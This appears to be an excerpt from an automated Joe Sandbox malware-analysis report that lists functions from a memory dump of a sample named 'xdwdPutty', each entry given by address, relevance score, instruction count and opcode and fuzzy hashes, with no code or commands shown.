                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3ae577278908c23c7419db0b07724a51a791dadb2f4e40652e0b64eda9f697b9
                              • Instruction ID: 10922ed173817b3737bbd40e42c0d5940c842833968546a283986084d15f34d6
                              • Opcode Fuzzy Hash: 3ae577278908c23c7419db0b07724a51a791dadb2f4e40652e0b64eda9f697b9
                              • Instruction Fuzzy Hash: 3651F520A1E6838FF742A77888952B93BD1DF56300F2901B6D949C72D3ED4C684783D2
                              Function 00007FFF60F4456A Relevance: .2, Instructions: 191COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2bfb48133308cc0af60761d2aea1603d09b9937fe47936d3924f66896ab1694b
                              • Instruction ID: 0b5d277203fbf8b77dccf40713b0b5ad5f6fb43d23f11c05340f2d84d9a31657
                              • Opcode Fuzzy Hash: 2bfb48133308cc0af60761d2aea1603d09b9937fe47936d3924f66896ab1694b
                              • Instruction Fuzzy Hash: C9514D71918A1C8FDB98DF58D845BE9BBF1FB59310F1082AAD40DE3252DF34A9858F81
                              Function 00007FFF60F46EC0 Relevance: .2, Instructions: 189COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f84af4c9b1ae479afa8c9a08fccffc3b8e856c0329f75d982043b67847a9bcf7
                              • Instruction ID: 2f4262621e8ef84d51acb79f4e9e063b47f1be8798289b091347db4df3a9d092
                              • Opcode Fuzzy Hash: f84af4c9b1ae479afa8c9a08fccffc3b8e856c0329f75d982043b67847a9bcf7
                              • Instruction Fuzzy Hash: 49516230518A4D8FEBA8DF28D8457E977D1FF58310F14822EE84DC2396DF3499458B82
                              Function 00007FFF60F47717 Relevance: .2, Instructions: 182COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: db97041af051d1e358d401970003b50cbfe63d2964d429830926f9baa639bf91
                              • Instruction ID: db59e5416bf861faf2ec844ffabbd96795cdbd64d3e8907a93f0ae1e663d7d17
                              • Opcode Fuzzy Hash: db97041af051d1e358d401970003b50cbfe63d2964d429830926f9baa639bf91
                              • Instruction Fuzzy Hash: 86517030A18A4A8FEB68DF28C8457E977D1FF58310F54826ED84DC7396DF3899458B82
                              Function 00007FFF60F4457F Relevance: .2, Instructions: 181COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2b5148d5b37a2320606b8852747a2b3b247ebfb5c8a09f200bb8279f919564b9
                              • Instruction ID: 1b9ee6c62a81e4aceeb6a25cf30a02cc821829e689d34db17dba3090b2336275
                              • Opcode Fuzzy Hash: 2b5148d5b37a2320606b8852747a2b3b247ebfb5c8a09f200bb8279f919564b9
                              • Instruction Fuzzy Hash: 83512E71918A1C8FDB98DF58D845BE9BBF1FB58310F1082AAD40DE3256DF34A9858F81
                              Function 00007FFF60F4A530 Relevance: .2, Instructions: 175COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d8b639bf06f5ab4ae2594fb39054f78fa91f03a25bbb7cea9fcb2f714a2759d9
                              • Instruction ID: 1488a3d8814cf37c5098301e167aff488227db93cefe1e4bcbe62383b78ed0a2
                              • Opcode Fuzzy Hash: d8b639bf06f5ab4ae2594fb39054f78fa91f03a25bbb7cea9fcb2f714a2759d9
                              • Instruction Fuzzy Hash: 0051F53190D6898FD756E76898556E97FF0EF4B224B1901FBD488CB2A3EE2C580BC351
                              Function 00007FFF60F4D294 Relevance: .2, Instructions: 173COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 66950b5737d3051eda7885b34a212787589fbd5b7b3f9228fd8ead279c7e6941
                              • Instruction ID: b2ebc974e7e35be81e2115878d0cb7d09790232d1a0b050e673f8abf12203670
                              • Opcode Fuzzy Hash: 66950b5737d3051eda7885b34a212787589fbd5b7b3f9228fd8ead279c7e6941
                              • Instruction Fuzzy Hash: 2C41B261F1C90B8AFB58EA2C98562B973C1EF95305F640579D54EC33D7ED28F8164382
                              Function 00007FFF60F42FEA Relevance: .2, Instructions: 161COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b91874e5cbe6dc7d4345dbfb2d02bfcea616ec59e297870c8263f2a1139f45d0
                              • Instruction ID: 2bbeb885ad380da32627bf2423e18a75134883725f4dcd63603a599379d4afe3
                              • Opcode Fuzzy Hash: b91874e5cbe6dc7d4345dbfb2d02bfcea616ec59e297870c8263f2a1139f45d0
                              • Instruction Fuzzy Hash: C0515E61F1C51B87FB58BB6894966BE36C2EF98306FA10535E40DC33D7EE2CA9064352
                              Function 00007FFF60F422B5 Relevance: .2, Instructions: 159COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 61014184f25478e95fe075b8341164b2d01955faeeb2419af428928a9e8e20e1
                              • Instruction ID: f0f28ac5bcb4adf703efdf3320db774f4e68ac45f7b79d0f2dce4da61fbc2b0b
                              • Opcode Fuzzy Hash: 61014184f25478e95fe075b8341164b2d01955faeeb2419af428928a9e8e20e1
                              • Instruction Fuzzy Hash: 97514A32F1C1478AFBA4AA68C0411BD27D2EF95324FA50579D94DC73C3DD2EAC664382
                              Function 00007FFF60F43540 Relevance: .1, Instructions: 149COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c75b232930f036e29c229c9cfe39eff2394a69ff3744d243f35bbfcc6c107835
                              • Instruction ID: 3edbf3de36e187f4d507db40f83680f1f6dad5e7e11d7ca1a31b1e0f8ad68816
                              • Opcode Fuzzy Hash: c75b232930f036e29c229c9cfe39eff2394a69ff3744d243f35bbfcc6c107835
                              • Instruction Fuzzy Hash: 94418221C2C5969AF3784669F8C24FDB3C1EB55720FA5417DDCA982BC7BC1C68A642C3
                              Function 00007FFF60F4C6DF Relevance: .1, Instructions: 142COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 794835501a50d9c7539517b7edddcbd2dddd8651bff58d7f28620d15e26a4119
                              • Instruction ID: bf275842f134ddb405aa786b9bc90d8617c59dda5450a77b39806f6125d0156e
                              • Opcode Fuzzy Hash: 794835501a50d9c7539517b7edddcbd2dddd8651bff58d7f28620d15e26a4119
                              • Instruction Fuzzy Hash: 5941F971E1C90ACFEBD4E76884562B977E1EF58300F641975D90ED3393EE2868098BD1
                              Function 00007FFF60F41B9F Relevance: .1, Instructions: 139COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cc141c6d0ff52555a9e1030bf6636310112908e2f9042b5e958be459b949730c
                              • Instruction ID: dd10a74e29ce332e53fdb60e650430027e6f8349ab3d44fd127ddcf188593150
                              • Opcode Fuzzy Hash: cc141c6d0ff52555a9e1030bf6636310112908e2f9042b5e958be459b949730c
                              • Instruction Fuzzy Hash: E141A301F1D51B56E68877B821661BF09E39F94302BE24834E90ED7B9FED7DAA020361
                              Function 00007FFF60F431F2 Relevance: .1, Instructions: 136COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 51efd57988fcf831ac43432e7ab3b681798eb01eefb8ade8efda09b30050b494
                              • Instruction ID: d33283a1af770980a4f7a686fdef835f252363b4d28b4835e86213e8ab6781a0
                              • Opcode Fuzzy Hash: 51efd57988fcf831ac43432e7ab3b681798eb01eefb8ade8efda09b30050b494
                              • Instruction Fuzzy Hash: D3413C21F5C81BCBEB94EB2890951BA36D3EB88312BA10435D40DC33D7EE3CAC428751
                              Function 00007FFF60F4EDF8 Relevance: .1, Instructions: 133COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f0dcff043c97c21d841be09873e3844a9d1dac6f9c94e68b5fb263c15840b9c8
                              • Instruction ID: a982e2332aa04a191d9d69a32d9a19ebd1e8320314f034bc4f57c2aef60f1100
                              • Opcode Fuzzy Hash: f0dcff043c97c21d841be09873e3844a9d1dac6f9c94e68b5fb263c15840b9c8
                              • Instruction Fuzzy Hash: 6341286188E3C24FE7A7862458256653FE0DF47215F2E41FBD98CCB1E7EA4C584E8362
                              Function 00007FFF60F4ACC6 Relevance: .1, Instructions: 131COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1af3733d0cbaf4caf1e7d57a2f5c7658437348186ecaef00c9da59ba67bb5a6c
                              • Instruction ID: df361a0407bf64cc062bb3503c0c03711678137a9f33889994c8c1ef00d2432c
                              • Opcode Fuzzy Hash: 1af3733d0cbaf4caf1e7d57a2f5c7658437348186ecaef00c9da59ba67bb5a6c
                              • Instruction Fuzzy Hash: 24413E31E1891E8FEB95EB6C84552BDB7E1FF98301B640179D80DD7396DE39AC428780
                              Function 00007FFF60F4AF47 Relevance: .1, Instructions: 125COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4a3c6272bbd21cbbeae97d7f255d0815b3b2a4542897a23a06591cbe10fbe383
                              • Instruction ID: 41c4001814751086f32b3c74818cd68be44d3230cfd6c0686c433ada53dd0ba8
                              • Opcode Fuzzy Hash: 4a3c6272bbd21cbbeae97d7f255d0815b3b2a4542897a23a06591cbe10fbe383
                              • Instruction Fuzzy Hash: F5410B31A1891ACFEB98EB6CD4556BDB3E1FF58301F6444B9D90EE33A3DE2868418750
                              Function 00007FFF60F4A650 Relevance: .1, Instructions: 115COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 08446f7619fa3e11ac1952d45b124e39d800239c2cbaf9455b91091f1a2cbd81
                              • Instruction ID: d8ea9a39b5733880f6c63c8c38f76a077e889ecb0284e86b18de921ea6d2760f
                              • Opcode Fuzzy Hash: 08446f7619fa3e11ac1952d45b124e39d800239c2cbaf9455b91091f1a2cbd81
                              • Instruction Fuzzy Hash: 6731D722D4D5939EEB25A674884A4B53BD0DF66200F1A05B9D889C72D3ED1C245B4393
                              Function 00007FFF60F4C521 Relevance: .1, Instructions: 110COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d5fbd24d94b5422ebbc85fe5e1a18b123dd2dd880e44345498a765f1f828541d
                              • Instruction ID: 67d8ac5bee8344477b84ecce35cf36024883482d2cc06204b56d927c6a93d939
                              • Opcode Fuzzy Hash: d5fbd24d94b5422ebbc85fe5e1a18b123dd2dd880e44345498a765f1f828541d
                              • Instruction Fuzzy Hash: CD311931A08A1C8FDF94EB68D885BEDB7F1FB58311F10416AD40EE3252DF34A9868B41
                              Function 00007FFF60F4BED9 Relevance: .1, Instructions: 109COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 96f39b4d60f7b2589c9d0569cdc60c5cf80176d3321ad6d4fc9943244ea13926
                              • Instruction ID: fe276f769dde927e57323fe9ce4bb1100303bafe6bd1e6a7c91e0198df49a08b
                              • Opcode Fuzzy Hash: 96f39b4d60f7b2589c9d0569cdc60c5cf80176d3321ad6d4fc9943244ea13926
                              • Instruction Fuzzy Hash: D8313E5080E3C64EE76B92744C252697FA0DF13211F2959FBC98CCA2E3ED1D581E8762
                              Function 00007FFF60F433DE Relevance: .1, Instructions: 90COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e949286c95c4a69d9e0bba0d6056aa5d3ccbccbc51cae845a6ed9a6a3a55491f
                              • Instruction ID: 346855ccf705be1ed43e8889f4f45a6cdeab2693d6b31f32d47e43b48943677a
                              • Opcode Fuzzy Hash: e949286c95c4a69d9e0bba0d6056aa5d3ccbccbc51cae845a6ed9a6a3a55491f
                              • Instruction Fuzzy Hash: C6214865A0D3C24FE713577498A12E43FB18F53220F1A01F7D489CB5E3E91D984B8362
                              Function 00007FFF60F4C18F Relevance: .1, Instructions: 89COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6566b7749bd577d0ccd387e6b19ee39cd1ba87fa06831a6b2c868fb39c2033fc
                              • Instruction ID: fc2d4b9e20479aa1fd4e7b94e9adc892815a43a2f3723402fb803afbfff9a0c6
                              • Opcode Fuzzy Hash: 6566b7749bd577d0ccd387e6b19ee39cd1ba87fa06831a6b2c868fb39c2033fc
                              • Instruction Fuzzy Hash: E4213E76D0C55B86FBE899A8881627833D0DB64311F642A39C919D23D3FDA86A1E43C1
                              Function 00007FFF60F4B007 Relevance: .1, Instructions: 85COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d2f9a25e3a434e598cc8c316c26d687c701a983223056033d8235d0e8fbd91c7
                              • Instruction ID: e8130382fa314f3eff9054371c4c524e6dc83f6ea6d57a3a6b55804b692365f3
                              • Opcode Fuzzy Hash: d2f9a25e3a434e598cc8c316c26d687c701a983223056033d8235d0e8fbd91c7
                              • Instruction Fuzzy Hash: 0D21EB31A1C81ACFEB98EB6CD4596BD73E1FF58302F640479D91DD32A3DE2868418751
                              Function 00007FFF60F4C171 Relevance: .1, Instructions: 84COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ce1fa84febcafe493a5837366b5dbc7dd371a580751644d986d4ce67525abbf1
                              • Instruction ID: a77c328c1dae283010fb5b71f540a36ca8339d51c5e3ba9976f35697ad11612a
                              • Opcode Fuzzy Hash: ce1fa84febcafe493a5837366b5dbc7dd371a580751644d986d4ce67525abbf1
                              • Instruction Fuzzy Hash: 3F217A62D0C04786FBED9AA8880A2B837C0DF64311F342A39C919C23D3FD9C660E43D1
                              Function 00007FFF60F47D46 Relevance: .1, Instructions: 83COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e6521a1698874de0bb1d38d3fa7510d43c31bc1afa1d3b2b7413cacf88159909
                              • Instruction ID: 0d613d217dbaa73d52420e6307dae9b545c59be825cb2a847514fce51e7008f9
                              • Opcode Fuzzy Hash: e6521a1698874de0bb1d38d3fa7510d43c31bc1afa1d3b2b7413cacf88159909
                              • Instruction Fuzzy Hash: EC312870518B8C8FEBA4DF28C8457D97BE1FF99710F10866AE84DC7256CB38A945CB81
                              Function 00007FFF60F4D0E5 Relevance: .1, Instructions: 80COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 80c4ce58bc3fa10dc4cd9d8b0c10b919a62596f58f4d947d7c76319e65502edf
                              • Instruction ID: 5fb733b1a466876c76a784898d7a6bf3afd3cf6dd0c86496700e741b3217ae2e
                              • Opcode Fuzzy Hash: 80c4ce58bc3fa10dc4cd9d8b0c10b919a62596f58f4d947d7c76319e65502edf
                              • Instruction Fuzzy Hash: 56119D32E0C91D8AFB68A61CE84A6F977E0DF85325F14007BDE8D97282DD18288683D1
                              Function 00007FFF60F49231 Relevance: .1, Instructions: 80COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3c00b821409d68236f43e8b0d58514aa6c68da0e62ce6ebb2c396a1d42fa39c3
                              • Instruction ID: f227d99e64070758e136107884c11d222562d0a42d695d9b444f3e10f282b770
                              • Opcode Fuzzy Hash: 3c00b821409d68236f43e8b0d58514aa6c68da0e62ce6ebb2c396a1d42fa39c3
                              • Instruction Fuzzy Hash: FF217122F0C6459FEB569728C9456B83BE0EF6A320F2901B7C849D72D3ED6C5D458392
                              Function 00007FFF60F4AF4F Relevance: .1, Instructions: 68COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7f15fee5477347e7d5730b9dd120605e06360e468c7957ea23be86a44d6b40d9
                              • Instruction ID: c10fe1b219966c14273d52a0211798f8a8b1c9526d3d83dd8d49e727b525d653
                              • Opcode Fuzzy Hash: 7f15fee5477347e7d5730b9dd120605e06360e468c7957ea23be86a44d6b40d9
                              • Instruction Fuzzy Hash: 17111C30A1891A8FE794FB2C84592BD77E2FF5C711B5404B9D80DE33A7EE24AC418790
                              Function 00007FFF60F4927F Relevance: .1, Instructions: 55COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7fd49ceedc54b94d2a97fac9a358951a4439689716c2c68ada0ab52736dd4931
                              • Instruction ID: 6ff853d065dc85679a4f145b8f5974cb5fa648e197e04ea1425fb3d227cbbdd3
                              • Opcode Fuzzy Hash: 7fd49ceedc54b94d2a97fac9a358951a4439689716c2c68ada0ab52736dd4931
                              • Instruction Fuzzy Hash: B4012931F1C91C9FEB50AB6CD4886AD77E1FB98321F250237E84DE3291DE6898818781
                              Function 00007FFF60F4D13F Relevance: .1, Instructions: 54COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ee4063548321b2f09e6ef94e36e9472f598cc5bea39c7b7524b5cc7fb7a26c9c
                              • Instruction ID: 42090e70b0030463477f6cc9f5570ed11683dec41ecd6a5f9918dcaf18cefbc6
                              • Opcode Fuzzy Hash: ee4063548321b2f09e6ef94e36e9472f598cc5bea39c7b7524b5cc7fb7a26c9c
                              • Instruction Fuzzy Hash: 9D01DF32D0C61D8AFF68A61898466FA77E0EF86324F140037DE9CA3282DC282C4583D1
                              Function 00007FFF60F4A4C1 Relevance: .1, Instructions: 54COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b813d6c683110a8234b8cea2e7a64e32d09495d88a477bc4bdf855dd4a2ae766
                              • Instruction ID: e7db44d53adb760f49cf0529c0e9744a77161892ff5e7b27103ecde7fe52b43a
                              • Opcode Fuzzy Hash: b813d6c683110a8234b8cea2e7a64e32d09495d88a477bc4bdf855dd4a2ae766
                              • Instruction Fuzzy Hash: F501DE30B1C91ACFEB98E76C94596B873E1EF59305B640079D90DC73A2EE29A8428740
                              Function 00007FFF60F437DA Relevance: .1, Instructions: 51COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ebe50094c852b7edc9808e6a0348565547033faa2bd870182980c9844f8f40bc
                              • Instruction ID: 788f08845885faeafd15d4c3ae180ba276707068aa9cf8117cecc0cc3e9f0a6c
                              • Opcode Fuzzy Hash: ebe50094c852b7edc9808e6a0348565547033faa2bd870182980c9844f8f40bc
                              • Instruction Fuzzy Hash: BD011232F2D82A8AFA98763C90552B8A2C1EB9C311F9504B6EC0EE33D2ED1D5C814780
                              Function 00007FFF60F4AF9C Relevance: .0, Instructions: 46COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 541dbca9f68d15ae915e2bf4b251f0b1adb0bbce4ed07da96830b1e79c2874de
                              • Instruction ID: 7ba436843f9b68e493c45f3b67d76f22aa8808f6abb546f91b4e587918616a24
                              • Opcode Fuzzy Hash: 541dbca9f68d15ae915e2bf4b251f0b1adb0bbce4ed07da96830b1e79c2874de
                              • Instruction Fuzzy Hash: 77F08130E1891E8FE794EB2C94946BC63D1EF4C311F5404BAE80DE3393EE296C818740
                              Function 00007FFF60F416D3 Relevance: .0, Instructions: 46COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 90df5a433207e31c73490bec868a3a6203ad2bfbb5f4bca614bc62bcdc2b0990
                              • Instruction ID: 7ea00f6de367b4463233dcce1fb4da4204f3fed9e4030d07c5be9ce152b9f1d8
                              • Opcode Fuzzy Hash: 90df5a433207e31c73490bec868a3a6203ad2bfbb5f4bca614bc62bcdc2b0990
                              • Instruction Fuzzy Hash: 60012C42D1C42786FB5062A8A4853BD76C0EF55354F6A49B0EE8DC73C3DE0C5C6507DA
